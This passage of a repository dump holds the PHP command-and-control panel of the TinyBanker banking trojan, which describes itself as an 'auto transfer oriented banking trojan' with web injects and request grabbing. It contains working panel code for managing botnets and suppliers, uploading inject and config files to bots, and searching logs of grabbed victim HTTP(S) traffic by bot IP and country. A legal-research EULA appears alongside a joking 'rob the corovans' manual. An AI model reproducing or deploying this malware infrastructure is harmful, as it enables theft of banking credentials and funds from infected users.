<td width=10%>Bots</td>
<td width=75%>Comment</td>
</tr>\n\n";
reset($SUPPLIERS);
while ($val = current($SUPPLIERS)) {
$key = key($SUPPLIERS);
print "<tr class='botstr'>
<td align=left>[ <b>{$key}</b> ]</td>
<td>200000</td>
<td>{$val['comment']}</td>
</tr>\n";
next($SUPPLIERS);
}
print "</table>
<form id='newsupplier'>
<table cellspacing=1 cellpadding=0 class='block'>
<tr>
<td width=15%><input type='text' name='supplier' maxlength=12 id='supplier'></td>
<td width=75%><input type='text' name='comment' maxlength=128 id='comment'></td>
<td width=10%><input type='submit' value='Add new supplier' class='srchbtn'></td>
</tr>
</table>
</form>
<script>
$('#newsupplier').submit(function() {
var frm = $(this);
if ($(frm).find('#supplier').val() == '') { alert('Supplier name is not specified'); return false; }
$(frm).find(':submit').attr('disabled', true);
$.post('?botnets', $(frm).serialize(), function(data) {
if (data == 'success') $('#suppliers').append('<tr class=\'botstr\'><td align=left>[ <b>'+$(frm).find('#supplier').val()+'</b> ]</td><td>200000</td><td>'+$(frm).find('#comment').val()+'</td></tr>');
else alert(data);
$(frm).find(':submit').attr('disabled', false);
});
return false;
});
</script>\n\n\n";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/configs.act.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
exit();
?>

38
malwares/Source/Original/TinyBanker_Jan2012/admin/control/configs.configs.php Normal file
View File

@@ -0,0 +1,38 @@
<?php
if (!BOT) exit();
if ($_POST['delete']) {
unlink('../data/configs/config');
}
elseif (!empty($_FILES)) {
$DATA = file_get_contents($_FILES['cfgfile']['tmp_name']);
$DATA = str_replace("\r\n", "\n", $DATA);
$DATA = str_replace("\r", "\n", $DATA);
file_put_contents('../data/configs/config', "\n".$DATA."\n");
}
clearstatcache();
$STAT = @stat('../data/configs/config');
print "<form method=post enctype=multipart/form-data>
<table cellspacing=1 cellpadding=0 class=block>
<tr>
<td width=250px><b>CONFIGS<br><br>";
if ($STAT['mtime']) print " file size: {$STAT['size']} bytes<br>
uploaded: ".date("d/m/Y - H:i:s", $STAT['mtime'])."</b><br><br>
<input type=submit class=button name='delete' value='DELETE'>";
print "</td>
<td><input type=file style='width:200px;' name='cfgfile'> <input type=submit class=button value='GO'></td>
</tr>
</table>
</form>";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/configs.correlation.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "correlation";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/configs.editor.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "editor";
?>

62
malwares/Source/Original/TinyBanker_Jan2012/admin/control/configs.php Normal file
View File

@@ -0,0 +1,62 @@
<?php
if (!BOT) exit();
if (IS_AJAX_REQUEST) include "configs.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>Configs</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>Correlation</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>Editor</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
include "configs.configs.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "configs.correlation.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->\n";
include "configs.editor.php";
print " <!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/events.act.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
exit();
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/events.events1.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "events1";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/events.events2.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "events2";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/events.events3.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "events3";
?>

62
malwares/Source/Original/TinyBanker_Jan2012/admin/control/events.php Normal file
View File

@@ -0,0 +1,62 @@
<?php
if (!BOT) exit();
if (IS_AJAX_REQUEST) include "events.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>events1</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>events2</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>events3</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
include "events.events1.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "events.events2.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->\n";
include "events.events3.php";
print " <!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/filter.act.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
exit();
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/filter.filter1.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "filter1";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/filter.filter2.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "filter2";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/filter.filter3.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "filter3";
?>

62
malwares/Source/Original/TinyBanker_Jan2012/admin/control/filter.php Normal file
View File

@@ -0,0 +1,62 @@
<?php
if (!BOT) exit();
if (IS_AJAX_REQUEST) include "filter.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>filter1</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>filter2</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>filter3</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
include "filter.filter1.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "filter.filter2.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->\n";
include "filter.filter3.php";
print " <!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->";
?>

114
malwares/Source/Original/TinyBanker_Jan2012/admin/control/help.php Normal file
View File

@@ -0,0 +1,114 @@
<?php
if (!defined('BOT')) die;
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>About</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>EULA</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>Manual</a></td>
<td nowrap class=tab_psv id='tl_4'><a href='javascript:sel(4);'>Support</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->
<table width=100% cellspacing=1 cellpadding=0 class=block>
<tr align=left>
<td style='padding-left:5px;'>
<br><b>{$MYNAME}. Auto transfer oriented banking trojan.</b><br><br>
<b>Features:</b><br><br>
Requests grabbing and web injects:<br>
- Internet Explorer http(s)<br>
- Mozilla Firefox http(s)<br>
- Google Chrome https<br><br>
</td>
</tr>
</table>
<!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->
<table width=100% cellspacing=1 cellpadding=0 class=block>
<tr align=left>
<td style='padding-left:5px;'>
<br><b>End User License Agreement</b><br><br>
This is the <b>{$MYNAME}</b> project.<br>
This tool is intended for legal security research, education and testing purposes only.<br>
It is not intended to be used for any unauthorized or illicit purposes.<br>
Any testing done with this tool must be limited to systems that you own or are explicitly authorized to test.<br>
Using this tool, you assume any and all responsibility for consequences which can arise up.<br>
Authors take no responsibility under any circumstances and damages that arises from your possession of this tool or using the code presented here.<br>
If you do not agree, you dont authorised to use this tool and must immediately delete it.<br><br>
</td>
</tr>
</table>
<!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->
<table width=100% cellspacing=1 cellpadding=0 class=block>
<tr align=left>
<td style='padding-left:5px;'><br><b>You can rob the corovans.</b><br><br></td>
</tr>
</table>
<!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->
<!-- TAB 4 begin -->
<table cellspacing=0 id='el_4' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 4 tabcontent begin -->
<table width=100% cellspacing=1 cellpadding=0 class=block>
<tr align=left>
<td style='padding-left:5px;'><br><b>May the Force be with you... always...</b><br><br></td>
</tr>
</table>
<!-- TAB 4 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 4 end -->";
?>

BIN
malwares/Source/Original/TinyBanker_Jan2012/admin/control/images/demonic_alien_microbe.ico Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 66 KiB

BIN
malwares/Source/Original/TinyBanker_Jan2012/admin/control/images/demonic_alien_microbe.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 5.9 KiB

BIN
malwares/Source/Original/TinyBanker_Jan2012/admin/control/images/loading.gif Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 72 KiB

BIN
malwares/Source/Original/TinyBanker_Jan2012/admin/control/images/saving.gif Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 723 B

134
malwares/Source/Original/TinyBanker_Jan2012/admin/control/index.php Normal file
View File

@@ -0,0 +1,134 @@
<?php
// error_reporting(0);
define('BOT', true);
define('IS_AJAX_REQUEST', isset($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) == 'xmlhttprequest');
file_put_contents("AJAX_REQUEST_LOG.txt", file_get_contents('php://input'));
include "../includes/mysql.php";
include "../includes/geoip.php";
include "../includes/continents.php";
include "../includes/datatypes.php";
include "../data/titles/suppliers.php";
include "../data/titles/botnets.php";
$GeoIP = new GeoIP;
$MYNAME = 'H&micro;NT&euro;R&dollar;';
function stripslashes_array($array) {
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
}
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
$MENU_ELEMENTS = array(
"Status" => "status",
"BotNETs" => "botnets",
"Tasks" => "tasks",
":",
"Injects" => "injects",
"Configs" => "configs",
"Plugins" => "plugins",
":",
"LOGS" => "logs",
"Stats" => "stats",
"Tracking" => "tracking",
"Events" => "events",
"Filter" => "filter",
":",
"System" => "system",
"Settings" => "settings",
"Help" => "help");
$DISPLAY = "";
$PAGE_INCLUDE = "";
$PAGE_CAPTION = "404 Not Found";
while (current($MENU_ELEMENTS)) {
$uri = current($MENU_ELEMENTS);
$key = key($MENU_ELEMENTS);
next($MENU_ELEMENTS);
if ($uri==":") {
$DISPLAY .= "<b> | </b>";
continue;
}
if (isset($_GET[$uri]) or ($uri=="status" and !$_SERVER['QUERY_STRING'])) {
$PAGE_INCLUDE = $uri;
$PAGE_CAPTION = $key;
$uri .= "' style='background:#090909;color:#709070;";
}
$DISPLAY .= "<a href='?{$uri}'>{$key}</a>";
}
$DISPLAY .= "<b> | </b><a href='?logout'>LogOut</a>";
if (!IS_AJAX_REQUEST) {
print "<html>
<head>
<title>{$MYNAME} | {$PAGE_CAPTION}</title>
<link rel='shortcut icon' href='images/demonic_alien_microbe.ico'>
<link rel='stylesheet' type='text/css' href='styles/dark.css'>
<script type='text/javascript' src='scripts/jquery.js'></script>
</head>
<body>
<table class=wrap cellspacing=0 cellpadding=0>
<tr>
<td colspan=5 class=menu>
{$DISPLAY}
</td>
</tr>
<tr>
<td>
<!-- #################################################################################################### -->\n\n\n";
}
if ($PAGE_INCLUDE) include $PAGE_INCLUDE.".php";
else echo "<b>{$PAGE_CAPTION}</b>";
$coock = "BOT_".$PAGE_INCLUDE;
$tab = intval($_COOKIE["BOT_".$PAGE_INCLUDE]);
print "\n\n\n<!-- #################################################################################################### -->
</td>
</tr>
</table>
<script>
function act(tab) {
document.getElementById('tl_'+tab).className='tab_act';
document.cookie='{$coock}='+tab;
$('#el_'+tab).fadeIn();
}
function sel(tab){
if (document.getElementById('el_'+tab).style.display == 'none') {
for (var i=1;i<5;i++) {
if (i==tab) continue;
try{document.getElementById('el_'+i).style.display = 'none';
document.getElementById('tl_'+i).className='tab_psv';}catch(e){}
}
act(tab);
}
}
sel(".($tab ? $tab : 1).");
</script>
<b>&copy; 2010 - ".date('Y', time())." {$MYNAME} control panel v 100.500 | 5 sql queries executed in 0.5 seconds | script executed in 0.7 seconds | request executed in 1.2 seconds</b>
</body>
</html>";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/injects.act.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
exit();
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/injects.correlation.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "correlation";
?>

38
malwares/Source/Original/TinyBanker_Jan2012/admin/control/injects.injects.php Normal file
View File

@@ -0,0 +1,38 @@
<?php
if (!BOT) exit();
if ($_POST['delete']) {
unlink('../data/injects/injects');
}
elseif (!empty($_FILES)) {
$DATA = file_get_contents($_FILES['injfile']['tmp_name']);
$DATA = str_replace("\r\n", "\n", $DATA);
$DATA = str_replace("\r", "\n", $DATA);
file_put_contents('../data/injects/injects', "\n".$DATA."\n");
}
clearstatcache();
$STAT = @stat('../data/injects/injects');
print "<form method=post enctype=multipart/form-data>
<table cellspacing=1 cellpadding=0 class=block>
<tr>
<td width=250px><b>INJECTS<br><br>";
if ($STAT['mtime']) print " file size: {$STAT['size']} bytes<br>
uploaded: ".date("d/m/Y - H:i:s", $STAT['mtime'])."</b><br><br>
<input type=submit class=button name='delete' value='DELETE'>";
print "</td>
<td><input type=file style='width:200px;' name='injfile'> <input type=submit class=button value='GO'></td>
</tr>
</table>
</form>";
?>

47
malwares/Source/Original/TinyBanker_Jan2012/admin/control/injects.php Normal file
View File

@@ -0,0 +1,47 @@
<?php
if (!BOT) exit();
if (IS_AJAX_REQUEST) include "injects.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>Injects</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>Correlation</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
include "injects.injects.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "injects.correlation.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->";
?>

77
malwares/Source/Original/TinyBanker_Jan2012/admin/control/logs.act.fn.php Normal file
View File

@@ -0,0 +1,77 @@
<?php
if (!BOT) exit();
function GetHttpReqBrief ($data) {
if (substr($data, 0, 4)=='GET ' || substr($data, 0, 5)=='POST ') {
$headers = explode("\r\n", $data);
if (substr($data, 4, 8)=="https://" || substr($data, 5, 8)=="https://" || substr($data, 4, 7)=="http://" || substr($data, 5, 7)=="http://") {
$pieces = explode(" ", $headers[0]);
$BRIEF = "<b>{$pieces[0]}</b> ";
$pieces = explode("/", $pieces[1]);
$BRIEF .= "{$pieces[0]}//<font class=highlight>{$pieces[2]}</font>/";
array_splice($pieces, 0, 3);
$resource = implode("/", $pieces);
$BRIEF .= $resource;
}
else {
$host = "unidentified";
while ($header = next($headers)) {
if (substr($header, 0, 6)=="Host: ") {
$host = substr($header, 6);
break;
}
}
$pieces = explode(" ", $headers[0]);
$BRIEF = "<b>{$pieces[0]}</b> https://<font class=highlight>{$host}</font>".$pieces[1];
}
}
else $BRIEF = "<b>unidentified</b>";
return $BRIEF;
}
function HighLight2 ($data) {
$expl = explode("\r\n\r\n", $data);
$headers = $expl[0];
$contents = $expl[1];
$hdrs = explode("\r\n", $headers);
$unit = explode(" ", $hdrs[0]);
$unit[0] = "<font class=hdrslight>{$unit[0]}</font>";
$hdrs[0] = implode(" ", $unit);
for ($i=1; $i<count($hdrs);$i++) {
$unit = explode(":", $hdrs[$i]);
$unit[0] = "<font class=hdrslight>{$unit[0]}</font>";
$hdrs[$i] = implode(":", $unit);
}
$headers = implode("\r\n", $hdrs);
$headers = str_replace("MSIE", "<font class=highlight>MSIE</font>", $headers);
$headers = str_replace("Chrome", "<font class=highlight>Chrome</font>", $headers);
$headers = str_replace("Firefox", "<font class=highlight>Firefox</font>", $headers);
$vars = explode("&amp;", $contents);
if (count($vars)>1) {
$count = count($vars);
for ($i=0; $i<$count;$i++) {
if ($vars[$i]=='') {
unset($vars[$i]);
continue;
}
$unit = explode("=", $vars[$i]);
$unit[1] = urldecode($unit[1]);
$vars[$i] = "<font class=varslight onclick='alert(\"{$unit[1]}\")'>{$unit[0]}=</font>".$unit[1];
}
$contents = implode("\n", $vars);
}
$data = $headers."\r\n\r\n".$contents;
return $data;
}
?>

292
malwares/Source/Original/TinyBanker_Jan2012/admin/control/logs.act.php Normal file
View File

@@ -0,0 +1,292 @@
<?php
if (!BOT) exit();
include "logs.act.fn.php";
// ##############
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD>
if (isset($_POST['botcomment'])) {
$_POST['botcomment'] = mysql_escape_string($_POST['botcomment']);
$query = "UPDATE `bots` SET `comment`='{$_POST['botcomment']}' WHERE `bot_uid`='{$_POST['bot_uid']}'";
mysql_query($query);
die ('*'.$_POST['botcomment']);
}
// ##############
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD>
if (isset($_POST['logcomment'])) {
$_POST['logcomment'] = mysql_escape_string($_POST['logcomment']);
foreach($LOGSTABLES as $var) {
$query = "UPDATE `{$var}` SET `comment`='{$_POST['logcomment']}' WHERE `log_id`=".intval($_POST['log_id']);
mysql_query($query);
}
die ('*'.$_POST['logcomment']);
}
// ##############
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
if (isset($_POST['dellogs'])) {
array_walk($_POST['logid'], 'intval');
foreach($LOGSTABLES as $var) {
$query = "DELETE FROM `{$var}` WHERE `log_id`=".implode(' OR `log_id`=', $_POST['logid']);
mysql_query($query);
}
die ('success');
}
// ##############
// <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD>
if(isset($_POST['phrase'])){
// ###################
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
if (!empty($_POST['phrase'])) {
$fp = fopen('../data/temp/searchlog.txt', 'a');
fwrite($fp, date("d.m.Y H:i:s")."\t".$_SERVER['REMOTE_ADDR']."\t".$_POST['phrase']."\n");
fclose($fp);
}
// ##############
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
$CONDITIONS = '';
if (!empty($_POST['phrase'])) $CONDITIONS[] = "`data` LIKE '%".mysql_escape_string($_POST['phrase'])."%'";
if (!empty($_POST['']));
if ($CONDITIONS) $CONDITIONS = ' WHERE '.implode(' AND ', $CONDITIONS);
// ##################
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
$SELTABLES = array();
sort($LOGSTABLES);
reset($LOGSTABLES);
while ($val = current($LOGSTABLES)) {
next($LOGSTABLES);
if ($val==$_POST['from_date'] or $val==$_POST['to_date']) break;
}
$SELTABLES[] = $val;
if ($_POST['from_date']!=$_POST['to_date']) while ($val = current($LOGSTABLES)) {
next($LOGSTABLES);
$SELTABLES[] = $val;
if ($val==$_POST['from_date'] or $val==$_POST['to_date']) break;
}
// #####################
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD>
foreach($SELTABLES as $key => $var) $SELTABLES[$key] = "SELECT * FROM `{$var}`".$CONDITIONS;
$query = implode(' UNION ', $SELTABLES).' LIMIT '.intval($_POST['limit']);
$result = mysql_query($query) or die("Query failed : " . mysql_error());
// #################
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
print "<!-- Search result begin -->
<input type='submit' value='Expand all' class='button' onclick=\"$(this).parent().find('div').show();\"><input type='submit' value='Collapse all' class='button' onclick=\"$(this).parent().find('div').hide();\"><input type='submit' value='Toggle' class='button' onclick=\"$(this).parent().find('div').toggle();\"> |
<input type='submit' value='Select all' class='button' onclick=\"$(this).parent().find(':checkbox').attr('checked', true);\"><input type='submit' value='Unselect all' class='button'onclick=\"$(this).parent().find(':checkbox').removeAttr('checked');\"><input type='submit' value='Invert' class='button'onclick=\"$(this).parent().find(':checkbox').checkToggle();\"> |
<input type='submit' value='Remember selected' class='button' onclick='remclick(this);return false;'><input type='submit' value='Export selected' class='button' onclick='exportclick(this);return false;'><input type='submit' value='Delete selected' class='button' onclick='deleteclick(this);return false;'>
<form onSubmit='return false'>
<table cellpadding=0 cellspacing=0 class='block'>
<tr><td>\n";
$i = 0;
while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
$i++;
$datasize = strlen($row['data']);
$row['data'] = addslashes(htmlspecialchars($row['data']));
switch ($row['data_type']) {
case 0:
$BRIEF = "";
break;
case 1:
$BRIEF = "";
break;
case 2:
$BRIEF = GetHttpReqBrief($row['data']);
$row['data'] = HighLight2($row['data']);
break;
case 3:
$BRIEF = "<b>Grabbed by inject data</b>";
break;
}
$row['data'] = nl2br($row['data']);
// \"$(this).parent().parent().parent().next().slideToggle('fast');\"
// <td onclick=\"$(this).find('div').html('<input type=text>')\"><div style='width:300px;'>".htmlspecialchars($row['comment'])."</div></td>
// $(this).find('div').hide();$(this).find('select').fadeIn();
$bot = mysql_fetch_array(mysql_query("SELECT * FROM `bots` WHERE `bot_uid`='{$row['bot_uid']}';"), MYSQL_ASSOC);
print "<table cellpadding=2 cellspacing=1 width=100%>
<tr class=briefrow".($i % 2).">
<td width=13px height=21px><input type=checkbox name='logid[]' value='{$row['log_id']}'></td>
<td onclick=\"$(this).parent().parent().parent().next().slideToggle('fast');\"><div class='briefcell'>{$BRIEF}</div></td>
<td onclick=\"CommentLog(this, {$row['log_id']});\"><div style='width:300px;'>".htmlspecialchars($row['comment'])."</div></td>
<td onclick=\"CommentBot(this, '{$row['bot_uid']}');\"><div id='UID{$row['bot_uid']}' style='width:300px;'>".htmlspecialchars($bot['comment'])."</div></td>
</tr>
</table>
<div style='margin-top: -1; display: none;'>
<table cellpadding=2 cellspacing=1 width=100%>
<tr class=logrow".($i % 2).">
<td align=right valign=top width=70px class=briefrow".($i % 2)."><b>Log ID:<br>
Bot UID:<br>
Data type:<br>
Time:<br>
Bot IP<br>
Country:<br>
Botnet:<br>
Supplier:<br>(sub):</b></td>
<td valign=top class=briefrow".($i % 2)."><div style='width:100px;'># {$row['log_id']} <a href='{$row['log_id']}'>({$datasize})</a><br>
{$row['bot_uid']}<br>
{$DATA_TYPES[$row['data_type']]}<br>
".date("d/m/y H:i:s", $row['timestamp'])."<br>
{$row['bot_ip']}<br>
[{$row['bot_country']}] {$GeoIP->GEOIP_COUNTRY_NAMES[$GeoIP->GEOIP_COUNTRY_CODE_TO_NUMBER[$row['bot_country']]]}<br>
[ {$row['bot_net']} ]<br>
[ {$row['bot_supp']} ]<br>({$row['supp_sub']})</div></td>
<td valign=top><div style='width:1052px;white-space:normal;'>{$row['data']}</div></td>
</tr>
</table>
</div>\n\n";
}
print "</td></tr>
</table>
</form>
<!-- Search result end -->
</td>
</tr>\n";
mysql_free_result($result);
print "<script>
function CommentLog(zis, log_id) {
if (!$(zis).find('input').length) {
var data = $(zis).find('div').text();
$(zis).find('div').html('<input type=text name=logcomment>').find('input').focus().val(data).keyup(function(e) {
if(e.keyCode == 13) {
data = $(zis).find('input').serialize();
$(zis).find('div').html('<img src=\"images/saving.gif\">');
$.post('?logs', data+'&log_id='+log_id, function(data) { $(zis).find('div').text(data); });
}
});
}
}
function CommentBot(zis, bot_uid) {
if (!$(zis).find('input').length) {
var data = $(zis).find('div').text();
$(zis).find('div').html('<input type=text name=botcomment>').find('input').focus().val(data).keyup(function(e) {
if(e.keyCode == 13) {
data = $(zis).find('input').serialize();
$(zis).find('div').html('<img src=\"images/saving.gif\">');
$.post('?logs', data+'&bot_uid='+bot_uid, function(data) {
$('#[id=UID'+bot_uid+']').text(data);
// $('.UID'+bot_uid).text(data); // class
});
}
});
}
}
jQuery.fn.checkToggle = function() {
return this.each(function() {
this.checked = !this.checked;
});
};
function remclick(zis) {
alert('Not ready yet');
}
function exportclick(zis) {
alert('Not ready yet');
}
function deleteclick(zis) {
var frm = $(zis).parent().find('form');
var req = $(frm).serialize();
if (req == '') { alert('Select something first'); return false; }
if (confirm('Are you sure you want to delete selected logs ?')==false) return false;
$(zis).attr('disabled', true);
$.post('?logs', 'dellogs=&' + req, function(data) {
if (data == 'success') {
var els = $(frm).find('input:checked').parent().parent().parent();
$(els).parent().next().remove();
$(els).remove();
}
else alert(data);
$(zis).attr('disabled', false);
});
}
</script>";
}
exit();
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/logs.parser.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "parser";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/logs.patterns.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "patterns";
?>

67
malwares/Source/Original/TinyBanker_Jan2012/admin/control/logs.php Normal file
View File

@@ -0,0 +1,67 @@
<?php
if (!BOT) exit();
$LOGSTABLES = array();
$res = mysql_query("SHOW TABLES LIKE 'logs_%'");
while ($row = mysql_fetch_row($res)) $LOGSTABLES[] = $row[0];
if (IS_AJAX_REQUEST) include "logs.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>Search</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>Parser</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>Patterns</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
